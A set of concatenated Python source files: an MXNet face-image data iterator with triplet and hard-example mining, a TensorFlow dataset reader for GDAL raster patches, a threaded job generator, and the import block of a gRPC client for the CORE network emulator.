_list = _list[0:self.images_per_identity]
self.oseq += _list
print('oseq', len(self.oseq))
def time_reset(self):
self.time_now = datetime.datetime.now()
def time_elapsed(self):
time_now = datetime.datetime.now()
diff = time_now - self.time_now
return diff.total_seconds()
def select_triplets(self):
self.seq = []
while len(self.seq)<self.seq_min_size:
self.time_reset()
embeddings = None
bag_size = self.triplet_bag_size
batch_size = self.batch_size
#data = np.zeros( (bag_size,)+self.data_shape )
#label = np.zeros( (bag_size,) )
tag = []
#idx = np.zeros( (bag_size,) )
print('eval %d images..'%bag_size, self.triplet_oseq_cur)
print('triplet time stat', self.times)
if self.triplet_oseq_cur+bag_size>len(self.oseq):
self.triplet_oseq_reset()
print('eval %d images..'%bag_size, self.triplet_oseq_cur)
self.times[0] += self.time_elapsed()
self.time_reset()
#print(data.shape)
data = nd.zeros( self.provide_data[0][1] )
label = nd.zeros( self.provide_label[0][1] )
ba = 0
while True:
bb = min(ba+batch_size, bag_size)
if ba>=bb:
break
#_batch = self.data_iter.next()
#_data = _batch.data[0].asnumpy()
#print(_data.shape)
#_label = _batch.label[0].asnumpy()
#data[ba:bb,:,:,:] = _data
#label[ba:bb] = _label
for i in xrange(ba, bb):
_idx = self.oseq[i+self.triplet_oseq_cur]
s = self.imgrec.read_idx(_idx)
header, img = recordio.unpack(s)
img = self.imdecode(img)
data[i-ba][:] = self.postprocess_data(img)
label[i-ba][:] = header.label
tag.append( ( int(header.label), _idx) )
#idx[i] = _idx
db = mx.io.DataBatch(data=(data,), label=(label,))
self.mx_model.forward(db, is_train=False)
net_out = self.mx_model.get_outputs()
#print('eval for selecting triplets',ba,bb)
#print(net_out)
#print(len(net_out))
#print(net_out[0].asnumpy())
net_out = net_out[0].asnumpy()
#print(net_out)
#print('net_out', net_out.shape)
if embeddings is None:
embeddings = np.zeros( (bag_size, net_out.shape[1]))
embeddings[ba:bb,:] = net_out
ba = bb
assert len(tag)==bag_size
self.triplet_oseq_cur+=bag_size
embeddings = sklearn.preprocessing.normalize(embeddings)
self.times[1] += self.time_elapsed()
self.time_reset()
nrof_images_per_class = [1]
for i in xrange(1, bag_size):
if tag[i][0]==tag[i-1][0]:
nrof_images_per_class[-1]+=1
else:
nrof_images_per_class.append(1)
triplets = self.pick_triplets(embeddings, nrof_images_per_class) # shape=(T,3)
print('found triplets', len(triplets))
ba = 0
while True:
bb = ba+self.per_batch_size//3
if bb>len(triplets):
break
_triplets = triplets[ba:bb]
for i in xrange(3):
for triplet in _triplets:
_pos = triplet[i]
_idx = tag[_pos][1]
self.seq.append(_idx)
ba = bb
self.times[2] += self.time_elapsed()
def triplet_reset(self):
self.select_triplets()
def hard_mining_reset(self):
#import faiss
from annoy import AnnoyIndex
data = nd.zeros( self.provide_data[0][1] )
label = nd.zeros( self.provide_label[0][1] )
#label = np.zeros( self.provide_label[0][1] )
X = None
ba = 0
batch_num = 0
while ba<len(self.oseq):
batch_num+=1
if batch_num%10==0:
print('loading batch',batch_num, ba)
bb = min(ba+self.batch_size, len(self.oseq))
_count = bb-ba
for i in xrange(_count):
idx = self.oseq[i+ba]
s = self.imgrec.read_idx(idx)
header, img = recordio.unpack(s)
img = self.imdecode(img)
data[i][:] = self.postprocess_data(img)
label[i][:] = header.label
db = mx.io.DataBatch(data=(data,self.data_extra), label=(label,))
self.mx_model.forward(db, is_train=False)
net_out = self.mx_model.get_outputs()
embedding = net_out[0].asnumpy()
nembedding = sklearn.preprocessing.normalize(embedding)
if _count<self.batch_size:
nembedding = nembedding[0:_count,:]
if X is None:
X = np.zeros( (len(self.id2range), nembedding.shape[1]), dtype=np.float32 )
nplabel = label.asnumpy()
for i in xrange(_count):
ilabel = int(nplabel[i])
#print(ilabel, ilabel.__class__)
X[ilabel] += nembedding[i]
ba = bb
X = sklearn.preprocessing.normalize(X)
d = X.shape[1]
t = AnnoyIndex(d, metric='euclidean')
for i in xrange(X.shape[0]):
t.add_item(i, X[i])
print('start to build index')
t.build(20)
print(X.shape)
k = self.per_identities
self.seq = []
for i in xrange(X.shape[0]):
nnlist = t.get_nns_by_item(i, k)
assert nnlist[0]==i
for _label in nnlist:
assert _label<len(self.id2range)
_id = self.header0[0]+_label
v = self.id2range[_id]
_list = range(*v)
if len(_list)<self.images_per_identity:
random.shuffle(_list)
else:
_list = np.random.choice(_list, self.images_per_identity, replace=False)
for i in xrange(self.images_per_identity):
_idx = _list[i%len(_list)]
self.seq.append(_idx)
#faiss_params = [20,5]
#quantizer = faiss.IndexFlatL2(d) # the other index
#index = faiss.IndexIVFFlat(quantizer, d, faiss_params[0], faiss.METRIC_L2)
#assert not index.is_trained
#index.train(X)
#index.add(X)
#assert index.is_trained
#print('trained')
#index.nprobe = faiss_params[1]
#D, I = index.search(X, k) # actual search
#print(I.shape)
#self.seq = []
#for i in xrange(I.shape[0]):
# #assert I[i][0]==i
# for j in xrange(k):
# _label = I[i][j]
# assert _label<len(self.id2range)
# _id = self.header0[0]+_label
# v = self.id2range[_id]
# _list = range(*v)
# if len(_list)<self.images_per_identity:
# random.shuffle(_list)
# else:
# _list = np.random.choice(_list, self.images_per_identity, replace=False)
# for i in xrange(self.images_per_identity):
# _idx = _list[i%len(_list)]
# self.seq.append(_idx)
def reset_c2c(self):
self.select_triplets()
for identity,v in self.id2range.iteritems():
_list = range(*v)
for idx in _list:
s = imgrec.read_idx(idx)
ocontents.append(s)
embeddings = None
#print(len(ocontents))
ba = 0
while True:
bb = min(ba+args.batch_size, len(ocontents))
if ba>=bb:
break
_batch_size = bb-ba
_batch_size2 = max(_batch_size, args.ctx_num)
data = nd.zeros( (_batch_size2,3, image_size[0], image_size[1]) )
label = nd.zeros( (_batch_size2,) )
count = bb-ba
ii=0
for i in xrange(ba, bb):
header, img = mx.recordio.unpack(ocontents[i])
img = mx.image.imdecode(img)
img = nd.transpose(img, axes=(2, 0, 1))
data[ii][:] = img
label[ii][:] = header.label
ii+=1
while ii<_batch_size2:
data[ii][:] = data[0][:]
label[ii][:] = label[0][:]
ii+=1
db = mx.io.DataBatch(data=(data,), label=(label,))
self.mx_model.forward(db, is_train=False)
net_out = self.mx_model.get_outputs()
net_out = net_out[0].asnumpy()
model.forward(db, is_train=False)
net_out = model.get_outputs()
net_out = net_out[0].asnumpy()
if embeddings is None:
embeddings = np.zeros( (len(ocontents), net_out.shape[1]))
embeddings[ba:bb,:] = net_out[0:_batch_size,:]
ba = bb
embeddings = sklearn.preprocessing.normalize(embeddings)
embedding = np.mean(embeddings, axis=0, keepdims=True)
embedding = sklearn.preprocessing.normalize(embedding)
sims = np.dot(embeddings, embedding).flatten()
assert len(sims)==len(_list)
for i in xrange(len(_list)):
_idx = _list[i]
self.idx2cos[_idx] = sims[i]
def reset(self):
"""Resets the iterator to the beginning of the data."""
print('call reset()')
if self.c2c_auto:
self.reset_c2c()
self.cur = 0
if self.images_per_identity>0:
if self.triplet_mode:
self.triplet_reset()
elif not self.hard_mining:
self.seq = []
idlist = []
for _id,v in self.id2range.iteritems():
idlist.append((_id,range(*v)))
for r in xrange(self.repeat):
if r%10==0:
print('repeat', r)
if self.shuffle:
random.shuffle(idlist)
for item in idlist:
_id = item[0]
_list = item[1]
#random.shuffle(_list)
if len(_list)<self.images_per_identity:
random.shuffle(_list)
else:
_list = np.random.choice(_list, self.images_per_identity, replace=False)
for i in xrange(self.images_per_identity):
_idx = _list[i%len(_list)]
self.seq.append(_idx)
else:
self.hard_mining_reset()
print('seq len', len(self.seq))
else:
if self.shuffle:
random.shuffle(self.seq)
if self.seq is None and self.imgrec is not None:
self.imgrec.reset()
def num_samples(self):
return len(self.seq)
def next_sample(self):
"""Helper function for reading in next sample."""
#set total batch size, for example, 1800, and maximum size for each people, for example 45
if self.seq is not None:
while True:
if self.cur >= len(self.seq):
raise StopIteration
idx = self.seq[self.cur]
self.cur += 1
if self.imgrec is not None:
s = self.imgrec.read_idx(idx)
header, img = recordio.unpack(s)
label = header.label
if self.output_c2c:
count = self.idx2flag[idx]
if self.output_c2c==1:
v = np.random.uniform(0.4, 0.5)
elif self.output_c2c==2:
v = np.random.uniform(0.4, 0.5)
if count>=self.output_c2c:
v = np.random.uniform(0.3, 0.4)
elif self.output_c2c==3:
v = (9.5 - math.log(2.0+count))/10.0
v = min(max(v, 0.3), 0.5)
elif self.output_c2c==4:
mu = 0.0
sigma = 0.1
mrange = [0.4,0.5]
v = numpy.random.normal(mu, sigma)
v = math.abs(v)*-1.0+mrange[1]
v = max(v, mrange[0])
elif self.output_c2c==5:
v = np.random.uniform(0.41, 0.51)
if count>=175:
v = np.random.uniform(0.37, 0.47)
elif self.output_c2c==6:
v = np.random.uniform(0.41, 0.51)
if count>=175:
v = np.random.uniform(0.38, 0.48)
else:
assert False
label = [label, v]
else:
if not isinstance(label, numbers.Number):
label = label[0]
return label, img, None, None
else:
label, fname, bbox, landmark = self.imglist[idx]
return label, self.read_image(fname), bbox, landmark
else:
s = self.imgrec.read()
if s is None:
raise StopIteration
header, img = recordio.unpack(s)
return header.label, img, None, None
def brightness_aug(self, src, x):
alpha = 1.0 + random.uniform(-x, x)
src *= alpha
return src
def contrast_aug(self, src, x):
alpha = 1.0 + random.uniform(-x, x)
coef = np.array([[[0.299, 0.587, 0.114]]])
gray = src * coef
gray = (3.0 * (1.0 - alpha) / gray.size) * np.sum(gray)
src *= alpha
src += gray
return src
def saturation_aug(self, src, x):
alpha = 1.0 + random.uniform(-x, x)
coef = np.array([[[0.299, 0.587, 0.114]]])
gray = src * coef
gray = np.sum(gray, axis=2, keepdims=True)
gray *= (1.0 - alpha)
src *= alpha
src += gray
return src
def color_aug(self, img, x):
augs = [self.brightness_aug, self.contrast_aug, self.saturation_aug]
random.shuffle(augs)
for aug in augs:
#print(img.shape)
img = aug(img, x)
#print(img.shape)
return img
def mirror_aug(self, img):
_rd = random.randint(0,1)
if _rd==1:
for c in xrange(img.shape[2]):
img[:,:,c] = np.fliplr(img[:,:,c])
return img
def next(self):
if not self.is_init:
self.reset()
self.is_init = True
"""Returns the next batch of data."""
#print('in next', self.cur, self.labelcur)
self.nbatch+=1
batch_size = self.batch_size
c, h, w = self.data_shape
batch_data = nd.empty((batch_size, c, h, w))
if self.provide_label: # is not None:
batch_label = nd.empty(self.provide_label[0][1])
else:
batch_label = nd.empty((batch_size,))
i = 0
try:
while i < batch_size:
label, s, bbox, landmark = self.next_sample()
_data = self.imdecode(s)
if self.rand_mirror:
_rd = random.randint(0,1)
if _rd==1:
_data = mx.ndarray.flip(data=_data, axis=1)
if self.nd_mean is not None:
_data = _data.astype('float32')
_data -= self.nd_mean
_data *= 0.0078125
if self.cutoff>0:
centerh = random.randint(0, _data.shape[0]-1)
centerw = random.randint(0, _data.shape[1]-1)
half = self.cutoff//2
starth = max(0, centerh-half)
endh = min(_data.shape[0], centerh+half)
startw = max(0, centerw-half)
endw = min(_data.shape[1], centerw+half)
_data = _data.astype('float32')
#print(starth, endh, startw, endw, _data.shape)
_data[starth:endh, startw:endw, :] = 127.5
#_npdata = _data.asnumpy()
#if landmark is not None:
# _npdata = face_preprocess.preprocess(_npdata, bbox = bbox, landmark=landmark, image_size=self.image_size)
#if self.rand_mirror:
# _npdata = self.mirror_aug(_npdata)
#if self.mean is not None:
# _npdata = _npdata.astype(np.float32)
# _npdata -= self.mean
# _npdata *= 0.0078125
#nimg = np.zeros(_npdata.shape, dtype=np.float32)
#nimg[self.patch[1]:self.patch[3],self.patch[0]:self.patch[2],:] = _npdata[self.patch[1]:self.patch[3], self.patch[0]:self.patch[2], :]
#_data = mx.nd.array(nimg)
data = [_data]
try:
self.check_valid_image(data)
except RuntimeError as e:
logging.debug('Invalid image, skipping: %s', str(e))
continue
#print('aa',data[0].shape)
#data = self.augmentation_transform(data)
#print('bb',data[0].shape)
for datum in data:
assert i < batch_size, 'Batch size must be multiples of augmenter output length'
#print(datum.shape)
batch_data[i][:] = self.postprocess_data(datum)
if self.provide_label is not None:
if not self.coco_mode:
if len(batch_label.shape)==1:
batch_label[i][:] = label
else:
for ll in xrange(batch_label.shape[1]):
v = label[ll]
if ll>0:
#c2c = v
#_param = [0.5, 0.4, 0.85, 0.75]
#_a = (_param[1]-_param[0])/(_param[3]-_param[2])
#m = _param[1]+_a*(c2c-_param[3])
#m = min(_param[0], max(_param[1],m))
#v = math.cos(m)
#v = v*v
m = v
v = math.cos(m)
v = v*v
#print('m', i,m,v)
batch_label[i][ll] = v
else:
batch_label[i][:] = (i%self.per_batch_size)//self.images_per_identity
i += 1
except StopIteration:
if i<batch_size:
raise StopIteration
#print('next end', batch_size, i)
_label = None
if self.provide_label is not None:
_label = [batch_label]
if self.data_extra is not None:
return io.DataBatch([batch_data, self.data_extra], _label, batch_size - i)
else:
return io.DataBatch([batch_data], _label, batch_size - i)
def check_data_shape(self, data_shape):
"""Checks if the input data shape is valid"""
if not len(data_shape) == 3:
raise ValueError('data_shape should have length 3, with dimensions CxHxW')
if not data_shape[0] == 3:
raise ValueError('This iterator expects inputs to have 3 channels.')
def check_valid_image(self, data):
"""Checks if the input data is valid"""
if len(data[0].shape) == 0:
raise RuntimeError('Data shape is wrong')
def imdecode(self, s):
"""Decodes a string or byte string to an NDArray.
See mx.img.imdecode for more details."""
img = mx.image.imdecode(s) #mx.ndarray
return img
def read_image(self, fname):
"""Reads an input image `fname` and returns the decoded raw bytes.
Example usage:
----------
>>> dataIter.read_image('Face.jpg') # returns decoded raw bytes.
"""
with open(os.path.join(self.path_root, fname), 'rb') as fin:
img = fin.read()
return img
def augmentation_transform(self, data):
"""Transforms input data with specified augmentation."""
for aug in self.auglist:
data = [ret for src in data for ret in aug(src)]
return data
def postprocess_data(self, datum):
"""Final postprocessing step before image is loaded into the batch."""
return nd.transpose(datum, axes=(2, 0, 1))
class FaceImageIterList(io.DataIter):
def __init__(self, iter_list):
assert len(iter_list)>0
self.provide_data = iter_list[0].provide_data
self.provide_label = iter_list[0].provide_label
self.iter_list = iter_list
self.cur_iter = None
def reset(self):
self.cur_iter.reset()
def next(self):
self.cur_iter = random.choice(self.iter_list)
while True:
try:
ret = self.cur_iter.next()
except StopIteration:
self.cur_iter.reset()
continue
return ret
|
otbtf.py
|
# -*- coding: utf-8 -*-
# ==========================================================================
#
# Copyright 2018-2019 Remi Cresson (IRSTEA)
# Copyright 2020 Remi Cresson (INRAE)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ==========================================================================*/
import threading
import multiprocessing
import time
import numpy as np
import tensorflow as tf
import gdal
import logging
from abc import ABC, abstractmethod
"""
------------------------------------------------------- Helpers --------------------------------------------------------
"""
def gdal_open(filename):
"""
Open a GDAL raster
:param filename: raster file
:return: a GDAL ds instance
"""
ds = gdal.Open(filename)
if ds is None:
raise Exception("Unable to open file {}".format(filename))
return ds
def read_as_np_arr(ds, as_patches=True):
"""
Read a GDAL raster as numpy array
:param ds: GDAL ds instance
:param as_patches: if True, the returned numpy array has the following shape (n, psz_x, psz_x, nb_channels). If
False, the shape is (1, psz_y, psz_x, nb_channels)
:return: Numpy array of dim 4
"""
buffer = ds.ReadAsArray()
szx = ds.RasterXSize
if len(buffer.shape) == 3:
buffer = np.transpose(buffer, axes=(1, 2, 0))
if not as_patches:
n = 1
szy = ds.RasterYSize
else:
n = int(ds.RasterYSize / szx)
szy = szx
return np.float32(buffer.reshape((n, szy, szx, ds.RasterCount)))
"""
---------------------------------------------------- Buffer class ------------------------------------------------------
"""
class Buffer:
"""
Used to store and access list of objects
"""
def __init__(self, max_length):
self.max_length = max_length
self.container = []
def size(self):
return len(self.container)
def add(self, x):
self.container.append(x)
assert (self.size() <= self.max_length)
def is_complete(self):
return self.size() == self.max_length
"""
------------------------------------------------ PatchesReaderBase class -----------------------------------------------
"""
class PatchesReaderBase(ABC):
"""
Base class for patches delivery
"""
@abstractmethod
def get_sample(self, index):
"""
Return one sample.
:return One sample instance, whatever the sample structure is (dict, numpy array, ...)
"""
pass
@abstractmethod
def get_stats(self) -> dict:
"""
Compute some statistics for each source.
Depending if streaming is used, the statistics are computed directly in memory, or chunk-by-chunk.
:return a dict having the following structure:
{
"src_key_0":
{"min": np.array([...]),
"max": np.array([...]),
"mean": np.array([...]),
"std": np.array([...])},
...,
"src_key_M":
{"min": np.array([...]),
"max": np.array([...]),
"mean": np.array([...]),
"std": np.array([...])},
}
"""
pass
@abstractmethod
def get_size(self):
"""
Returns the total number of samples
:return: number of samples (int)
"""
pass
"""
----------------------------------------------- PatchesImagesReader class ----------------------------------------------
"""
class PatchesImagesReader(PatchesReaderBase):
"""
This class provides a read access to a set of patches images.
A patches image is an image of patches stacked in rows, as produced from the OTBTF "PatchesExtraction"
application, and is stored in a raster format (e.g. GeoTiff).
A source can be a particular domain in which the patches are extracted (remember that in OTBTF applications,
the number of sources is controlled by the OTB_TF_NSOURCES environment variable).
This class enables to use:
- multiple sources
- multiple patches images per source
Each patch can be independently accessed using the get_sample(index) function, with index in [0, self.size),
self.size being the total number of patches (must be the same for each sources).
:see PatchesReaderBase
"""
def __init__(self, filenames_dict: dict, use_streaming=False):
"""
:param filenames_dict: A dict() structured as follow:
{src_name1: [src1_patches_image_1.tif, ..., src1_patches_image_N.tif],
src_name2: [src2_patches_image_1.tif, ..., src2_patches_image_N.tif],
...
src_nameM: [srcM_patches_image_1.tif, ..., srcM_patches_image_N.tif]}
:param use_streaming: if True, the patches are read on the fly from the disc, nothing is kept in memory.
"""
assert (len(filenames_dict.values()) > 0)
# ds dict
self.ds = dict()
for src_key, src_filenames in filenames_dict.items():
self.ds[src_key] = []
for src_filename in src_filenames:
self.ds[src_key].append(gdal_open(src_filename))
if len(set([len(ds_list) for ds_list in self.ds.values()])) != 1:
raise Exception("Each source must have the same number of patches images")
# streaming on/off
self.use_streaming = use_streaming
# ds check
nb_of_patches = {key: 0 for key in self.ds}
self.nb_of_channels = dict()
for src_key, ds_list in self.ds.items():
for ds in ds_list:
nb_of_patches[src_key] += self._get_nb_of_patches(ds)
if src_key not in self.nb_of_channels:
self.nb_of_channels[src_key] = ds.RasterCount
else:
if self.nb_of_channels[src_key] != ds.RasterCount:
raise Exception("All patches images from one source must have the same number of channels!"
"Error happened for source: {}".format(src_key))
if len(set(nb_of_patches.values())) != 1:
raise Exception("Sources must have the same number of patches! Number of patches: {}".format(nb_of_patches))
# ds sizes
src_key_0 = list(self.ds)[0] # first key
self.ds_sizes = [self._get_nb_of_patches(ds) for ds in self.ds[src_key_0]]
self.size = sum(self.ds_sizes)
# if use_streaming is False, we store in memory all patches images
if not self.use_streaming:
patches_list = {src_key: [read_as_np_arr(ds) for ds in self.ds[src_key]] for src_key in self.ds}
self.patches_buffer = {src_key: np.concatenate(patches_list[src_key], axis=-1) for src_key in self.ds}
def _get_ds_and_offset_from_index(self, index):
offset = index
for i, ds_size in enumerate(self.ds_sizes):
if offset < ds_size:
break
offset -= ds_size
return i, offset
@staticmethod
def _get_nb_of_patches(ds):
return int(ds.RasterYSize / ds.RasterXSize)
@staticmethod
def _read_extract_as_np_arr(ds, offset):
assert (ds is not None)
psz = ds.RasterXSize
yoff = int(offset * psz)
assert (yoff + psz <= ds.RasterYSize)
buffer = ds.ReadAsArray(0, yoff, psz, psz)
if len(buffer.shape) == 3:
buffer = np.transpose(buffer, axes=(1, 2, 0))
return np.float32(buffer)
def get_sample(self, index):
"""
Return one sample of the dataset.
:param index: the sample index. Must be in the [0, self.size) range.
:return: The sample is stored in a dict() with the following structure:
{"src_key_0": np.array((psz_y_0, psz_x_0, nb_ch_0)),
"src_key_1": np.array((psz_y_1, psz_x_1, nb_ch_1)),
...
"src_key_M": np.array((psz_y_M, psz_x_M, nb_ch_M))}
"""
assert (0 <= index)
assert (index < self.size)
if not self.use_streaming:
res = {src_key: self.patches_buffer[src_key][index, :, :, :] for src_key in self.ds}
else:
i, offset = self._get_ds_and_offset_from_index(index)
res = {src_key: self._read_extract_as_np_arr(self.ds[src_key][i], offset) for src_key in self.ds}
return res
def get_stats(self):
"""
Compute some statistics for each source.
Depending if streaming is used, the statistics are computed directly in memory, or chunk-by-chunk.
:return statistics dict
"""
logging.info("Computing stats")
if not self.use_streaming:
axis = (0, 1, 2) # (row, col)
stats = {src_key: {"min": np.amin(patches_buffer, axis=axis),
"max": np.amax(patches_buffer, axis=axis),
"mean": np.mean(patches_buffer, axis=axis),
"std": np.std(patches_buffer, axis=axis)} for src_key, patches_buffer in
self.patches_buffer.items()}
else:
axis = (0, 1) # (row, col)
def _filled(value):
return {src_key: value * np.ones((self.nb_of_channels[src_key])) for src_key in self.ds}
_maxs = _filled(0.0)
_mins = _filled(float("inf"))
_sums = _filled(0.0)
_sqsums = _filled(0.0)
for index in range(self.size):
sample = self.get_sample(index=index)
for src_key, np_arr in sample.items():
rnumel = 1.0 / float(np_arr.shape[0] * np_arr.shape[1])
_mins[src_key] = np.minimum(np.amin(np_arr, axis=axis).flatten(), _mins[src_key])
_maxs[src_key] = np.maximum(np.amax(np_arr, axis=axis).flatten(), _maxs[src_key])
_sums[src_key] += rnumel * np.sum(np_arr, axis=axis).flatten()
_sqsums[src_key] += rnumel * np.sum(np.square(np_arr), axis=axis).flatten()
rsize = 1.0 / float(self.size)
stats = {src_key: {"min": _mins[src_key],
"max": _maxs[src_key],
"mean": rsize * _sums[src_key],
"std": np.sqrt(rsize * _sqsums[src_key] - np.square(rsize * _sums[src_key]))
} for src_key in self.ds}
logging.info("Stats: {}".format(stats))
return stats
def get_size(self):
return self.size
"""
------------------------------------------------- IteratorBase class ---------------------------------------------------
"""
class IteratorBase(ABC):
"""
Base class for iterators
"""
@abstractmethod
def __init__(self, patches_reader: PatchesReaderBase):
pass
"""
------------------------------------------------ RandomIterator class --------------------------------------------------
"""
class RandomIterator(IteratorBase):
"""
Pick a random number in the [0, handler.size) range.
"""
def __init__(self, patches_reader):
super().__init__(patches_reader=patches_reader)
self.indices = np.arange(0, patches_reader.get_size())
self._shuffle()
self.count = 0
def __iter__(self):
return self
def __next__(self):
current_index = self.indices[self.count]
if self.count < len(self.indices) - 1:
self.count += 1
else:
self._shuffle()
self.count = 0
return current_index
def _shuffle(self):
np.random.shuffle(self.indices)
"""
--------------------------------------------------- Dataset class ------------------------------------------------------
"""
class Dataset:
"""
Handles the "mining" of patches.
This class has a thread that extract tuples from the readers, while ensuring the access of already gathered tuples.
:see PatchesReaderBase
:see Buffer
"""
def __init__(self, patches_reader: PatchesReaderBase, buffer_length: int = 128,
Iterator: IteratorBase = RandomIterator):
"""
:param patches_reader: The patches reader instance
:param buffer_length: The number of samples that are stored in the buffer
:param Iterator: The iterator class used to generate the sequence of patches indices.
"""
# patches reader
self.patches_reader = patches_reader
self.size = self.patches_reader.get_size()
# iterator
self.iterator = Iterator(patches_reader=self.patches_reader)
# Get patches sizes and type, of the first sample of the first tile
self.output_types = dict()
self.output_shapes = dict()
one_sample = self.patches_reader.get_sample(index=0)
for src_key, np_arr in one_sample.items():
self.output_shapes[src_key] = np_arr.shape
self.output_types[src_key] = tf.dtypes.as_dtype(np_arr.dtype)
logging.info("output_types: {}".format(self.output_types))
logging.info("output_shapes: {}".format(self.output_shapes))
# buffers
self.miner_buffer = Buffer(buffer_length)
self.mining_lock = multiprocessing.Lock()
self.consumer_buffer = Buffer(buffer_length)
self.consumer_buffer_pos = 0
self.tot_wait = 0
self.miner_thread = self._summon_miner_thread()
self.read_lock = multiprocessing.Lock()
self._dump()
# Prepare tf dataset for one epoch
self.tf_dataset = tf.data.Dataset.from_generator(self._generator,
output_types=self.output_types,
output_shapes=self.output_shapes).repeat(1)
def get_stats(self) -> dict:
"""
:return: the dataset statistics, computed by the patches reader
"""
with self.mining_lock:
return self.patches_reader.get_stats()
def read_one_sample(self):
"""
Read one element of the consumer_buffer
The lock is used to prevent different threads to read and update the internal counter concurrently
"""
with self.read_lock:
output = None
if self.consumer_buffer_pos < self.consumer_buffer.max_length:
output = self.consumer_buffer.container[self.consumer_buffer_pos]
self.consumer_buffer_pos += 1
if self.consumer_buffer_pos == self.consumer_buffer.max_length:
self._dump()
self.consumer_buffer_pos = 0
return output
def _dump(self):
"""
This function dumps the miner_buffer into the consumer_buffer, and restart the miner_thread
"""
# Wait for miner to finish his job
t = time.time()
self.miner_thread.join()
self.tot_wait += time.time() - t
# Copy miner_buffer.container --> consumer_buffer.container
self.consumer_buffer.container = [elem for elem in self.miner_buffer.container]
# Clear miner_buffer.container
self.miner_buffer.container.clear()
# Restart miner_thread
self.miner_thread = self._summon_miner_thread()
def _collect(self):
"""
This function collects samples.
It is threaded by the miner_thread.
"""
# Fill the miner_container until it's full
while not self.miner_buffer.is_complete():
try:
index = next(self.iterator)
with self.mining_lock:
new_sample = self.patches_reader.get_sample(index=index)
self.miner_buffer.add(new_sample)
except Exception as e:
logging.warning("Error during collecting samples: {}".format(e))
def _summon_miner_thread(self):
"""
Create and starts the thread for the data collect
"""
t = threading.Thread(target=self._collect)
t.start()
return t
def _generator(self):
"""
Generator function, used for the tf dataset
"""
for elem in range(self.size):
yield self.read_one_sample()
def get_tf_dataset(self, batch_size, drop_remainder=True):
"""
Returns a TF dataset, ready to be used with the provided batch size
:param batch_size: the batch size
:param drop_remainder: drop incomplete batches
:return: The TF dataset
"""
if batch_size <= 2 * self.miner_buffer.max_length:
logging.warning("Batch size is {} but dataset buffer has {} elements. Consider using a larger dataset "
"buffer to avoid I/O bottleneck".format(batch_size, self.miner_buffer.max_length))
return self.tf_dataset.batch(batch_size, drop_remainder=drop_remainder)
def get_total_wait_in_seconds(self):
"""
Returns the number of seconds during which the data gathering was delayed because of I/O bottleneck
:return: duration in seconds
"""
return self.tot_wait
"""
------------------------------------------- DatasetFromPatchesImages class ---------------------------------------------
"""
class DatasetFromPatchesImages(Dataset):
"""
Handles the "mining" of a set of patches images.
:see PatchesImagesReader
:see Dataset
"""
def __init__(self, filenames_dict: dict, use_streaming: bool = False, buffer_length: int = 128,
Iterator: IteratorBase = RandomIterator):
"""
:param filenames_dict: A dict() structured as follow:
{src_name1: [src1_patches_image1, ..., src1_patches_imageN1],
src_name2: [src2_patches_image2, ..., src2_patches_imageN2],
...
src_nameM: [srcM_patches_image1, ..., srcM_patches_imageNM]}
:param use_streaming: if True, the patches are read on the fly from the disc, nothing is kept in memory.
:param buffer_length: The number of samples that are stored in the buffer (used when "use_streaming" is True).
:param Iterator: The iterator class used to generate the sequence of patches indices.
"""
# patches reader
patches_reader = PatchesImagesReader(filenames_dict=filenames_dict, use_streaming=use_streaming)
super().__init__(patches_reader=patches_reader, buffer_length=buffer_length, Iterator=Iterator)
|
jobgen.py
|
import threading, time
from debug_utils import *
from rvs import *
from msg import *
class JobGen():
def __init__(self, inter_ar_time_rv, serv_time_rv, size_inBs_rv, out, num_jobs_to_send):
self.inter_ar_time_rv = inter_ar_time_rv
self.serv_time_rv = serv_time_rv
self.size_inBs_rv = size_inBs_rv
self.out = out
self.num_jobs_to_send = num_jobs_to_send
self.num_jobs_sent = 0
t = threading.Thread(target=self.run, daemon=True)
t.start()
def run(self):
while 1:
inter_ar_time = self.inter_ar_time_rv.sample() # random.expovariate(self.rate)
log(DEBUG, "sleeping ...", inter_ar_time=inter_ar_time)
time.sleep(inter_ar_time)
self.num_jobs_sent += 1
self.out.put(
Job(_id = self.num_jobs_sent,
serv_time = self.serv_time_rv.sample(),
size_inBs = int(self.size_inBs_rv.sample())))
if self.num_jobs_sent == self.num_jobs_to_send:
return
|
client.py
|
"""
gRpc client for interfacing with CORE.
"""
import logging
import threading
from contextlib import contextmanager
from typing import Any, Callable, Dict, Generator, Iterable, List
import grpc
from core.api.grpc import configservices_pb2, core_pb2, core_pb2_grpc
from core.api.grpc.configservices_pb2 import (
GetConfigServiceDefaultsRequest,
GetConfigServiceDefaultsResponse,
GetConfigServicesRequest,
GetConfigServicesResponse,
GetNodeConfigServiceConfigsRequest,
GetNodeConfigServiceConfigsResponse,
GetNodeConfigServiceRequest,
GetNodeConfigServiceResponse,
GetNodeConfigServicesRequest,
GetNodeConfigServicesResponse,
SetNodeConfigServiceRequest,
SetNodeConfigServiceResponse,
)
from core.api.grpc.core_pb2 import ExecuteScriptRequest, ExecuteScriptResponse
from core.api.grpc.emane_pb2 import (
EmaneLinkRequest,
EmaneLinkResponse,
EmaneModelConfig,
EmanePathlossesRequest,
EmanePathlossesResponse,
GetEmaneConfigRequest,
GetEmaneConfigResponse,
GetEmaneEventChannelRequest,
GetEmaneEventChannelResponse,
GetEmaneModelConfigRequest,
GetEmaneModelConfigResponse,
GetEmaneModelConfigsRequest,
GetEmaneModelConfigsResponse,
GetEmaneModelsRequest,
GetEmaneModelsResponse,
SetEmaneConfigRequest,
SetEmaneConfigResponse,
SetEmaneModelConfigRequest,
SetEmaneModelConfigResponse,
)
from core.api.grpc.mobility_pb2 import (
GetMobilityConfigRequest,
GetMobilityConfigResponse,
GetMobilityConfigsRequest,
GetMobilityConfigsResponse,
MobilityActionRequest,
MobilityActionResponse,
MobilityConfig,
SetMobilityConfigRequest,
SetMobilityConfigResponse,
)
from core.api.grpc.services_pb2 import (
GetNodeServiceConfigsRequest,
GetNodeServiceConfigsResponse,
GetNodeServiceFileRequest,
GetNodeServiceFileResponse,
GetNodeServiceRequest,
GetNodeServiceResponse,
GetServiceDefaultsRequest,
GetServiceDefaultsResponse,
GetServicesRequest,
GetServicesResponse,
ServiceAction,
ServiceActionRequest,
ServiceActionResponse,
ServiceConfig,
ServiceDefaults,
